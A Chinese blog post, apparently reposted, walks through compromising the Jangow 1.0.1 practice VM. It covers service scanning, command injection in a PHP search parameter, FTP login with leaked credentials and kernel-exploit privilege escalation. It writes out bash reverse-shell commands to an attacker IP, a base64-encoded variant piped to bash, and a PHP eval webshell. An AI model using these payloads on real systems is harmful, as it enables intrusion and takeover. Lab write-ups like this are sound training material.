靶机渗透|Jangow: 1.0.1

admin 2024年11月14日23:51:11评论10 views字数 1794阅读5分58秒阅读模式
#主机发现sudo nmap -sn 192.168.0.0/24

靶机渗透|Jangow: 1.0.1

#服务版本扫描 TCP扫描sudo nmap -sV -sT --min-rate 10000 192.168.0.105

靶机渗透|Jangow: 1.0.1

#udp扫描sudo nmap -sU --min-rate 10000 192.168.0.105

靶机渗透|Jangow: 1.0.1

#脚本扫描 系统版本扫描sudo nmap -sC -O 192.168.0.105

靶机渗透|Jangow: 1.0.1

#脚本漏洞扫描sudo nmap --script=vuln 192.168.0.105

靶机渗透|Jangow: 1.0.1

这是有sql注入嘛?

http://192.168.0.105/

靶机渗透|Jangow: 1.0.1

http://192.168.0.105/site/

靶机渗透|Jangow: 1.0.1

在底部看到这个,但并没有什么交互。

靶机渗透|Jangow: 1.0.1

点击projects,滑到这个页面

靶机渗透|Jangow: 1.0.1

点击buscar,跳转到http://192.168.0.105/site/busque.php?buscar=

什么也没有显示,可以看到是php站点。

靶机渗透|Jangow: 1.0.1

这里buscar参数思路是目录遍历?任意文件读取?sql注入?命令执行?

前面nmap -O 系统版本扫描是linux系统,尝试一下读取/etc/password

并没有发现什么

靶机渗透|Jangow: 1.0.1

sql注入,也没有发现

靶机渗透|Jangow: 1.0.1

来个ls看看,有点东西

靶机渗透|Jangow: 1.0.1

pwd

靶机渗透|Jangow: 1.0.1

尝试反弹shell

bash -i >& /dev/tcp/192.168.0.104/6666 0>&1

执行没有反应

靶机渗透|Jangow: 1.0.1

/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.104/6666 0>&1'

也是一样

靶机渗透|Jangow: 1.0.1

用base64看看

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA0LzY2NjYgMD4mMQo= |base64 -d|bash

还是一样,寻找其他办法

靶机渗透|Jangow: 1.0.1

whoami权限挺低,www-data

靶机渗透|Jangow: 1.0.1

尝试写一句话

echo '<?php eval($_POST["secf"]);' > secf.php

靶机渗透|Jangow: 1.0.1

可以看到路径是 site

靶机渗透|Jangow: 1.0.1

访问一下 http://192.168.0.105/site/secf.php 好像有了

靶机渗透|Jangow: 1.0.1

连接webshell

weevely http://192.168.0.105/site/secf.php secf

靶机渗透|Jangow: 1.0.1

试试使用哥斯拉(还是靠谱啊)

靶机渗透|Jangow: 1.0.1

靶机渗透|Jangow: 1.0.1

在wordpress目录下看到一个config文件

靶机渗透|Jangow: 1.0.1

在html目录下也发现了一个.backup文件

靶机渗透|Jangow: 1.0.1

接下来思路就是使用这些密码进行爆破,登录数据库,但之前扫描端口并没有发现与数据库,ssh相关的端口,但有一个ftp端口,使用这些密码尝试登录发ftp

ftp 192.168.0.105

靶机渗透|Jangow: 1.0.1

经过尝试只有.backup文件的账号密码能成功登录ftp

来到/home/jangow01下看到了user.txt文件,下载下来可以看到是flag

靶机渗透|Jangow: 1.0.1

拿到了第一个flag,怎么进行提权拿root权限的第二个flag?

对面主机没有开启ssh,如何把shell反弹回来?

哥斯拉执行反弹shell也失败

靶机渗透|Jangow: 1.0.1

创建一个j.sh,通过哥斯拉文件上传到靶机执行

#!/bin/bashbash -i >& /dev/tcp/192.168.0.104/6666 0>&1

靶机渗透|Jangow: 1.0.1

上传执行,也没有反弹,此时怀疑是网络问题?还是靶机有限制?不出网?

靶机渗透|Jangow: 1.0.1

netstat -ano

也没发现什么

靶机渗透|Jangow: 1.0.1

此时都没什么思路了

直接看看系统什么版本能不能直接大力出奇迹,用内核提权

uname -a

靶机渗透|Jangow: 1.0.1

searchsploit ubuntu 4.4.0-31

靶机渗透|Jangow: 1.0.1

一眼看到这四个,后三个对应版本,先试试范围小的43418

searchsploit -m 43418

靶机渗透|Jangow: 1.0.1

上传到靶机,gcc编译,执行

gcc 43418.c -o upchmod +x up./up

靶机渗透|Jangow: 1.0.1

失败

44298 失败!

47169 失败!

45010 也不行!  666666

难道是不是交互shell?还是要反弹一个交互shell?

在kali编译,上传执行,也是不行

靶机渗透|Jangow: 1.0.1

郁闷很久,很久。。。

突然想到前面的网络限制,是不是有限制出网的端口?

改个80,失败

靶机渗透|Jangow: 1.0.1

8080,失败

...................

...................

...................

直到443,6666

靶机渗透|Jangow: 1.0.1

试一下执行前面编译好的提权工具

靶机渗透|Jangow: 1.0.1

淦!!

靶机渗透|Jangow: 1.0.1

done!!!

最后重新试了一遍前面提权的四个工具,发现后三个都不行只有最先排除的45010可以,真艹蛋这运气。。。

原文始发于微信公众号(Security Followers):靶机渗透|Jangow: 1.0.1

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月14日23:51:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   靶机渗透|Jangow: 1.0.1https://cn-sec.com/archives/1763836.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息